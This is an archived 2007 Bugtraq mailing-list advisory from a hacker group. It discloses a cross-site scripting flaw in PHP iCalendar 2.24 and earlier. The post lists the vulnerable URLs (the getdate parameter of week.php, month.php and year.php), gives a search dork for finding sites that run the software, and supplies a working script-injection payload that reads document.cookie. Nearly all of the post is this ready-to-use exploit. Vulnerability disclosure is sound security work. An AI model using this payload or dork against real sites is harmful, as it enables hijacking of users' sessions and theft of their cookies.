| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 20 Dec 2007 15:02:01 -0000 From: sys-project@...mail.com To: bugtraq@...urityfocus.com Subject: PHP iCalendar <= 2.24 - Cross-Site Scripting Vulnerability # PHP iCalendar <= 2.24 - Cross-Site Scripting Vulnerability # Download: # http://phpicalendar.net/ # Bug found by Jose Luis Góngora Fernández / JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team / Sys - Project # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Powered by PHP iCalendar" [*] Exploit In (XSS): events/calview/week.php?cal=&getdate=[XSS] month.php?cal=&getdate=[XSS] year.php?cal=&getdate=[XSS] [*] Cross Siting Scripting (Code): "><script>alert(document.cookie)</script> //---------------------------------------\\ Greetz To: All Hackers Jose Luis Góngora Fernández / JosS!
Powered by blists - more mailing lists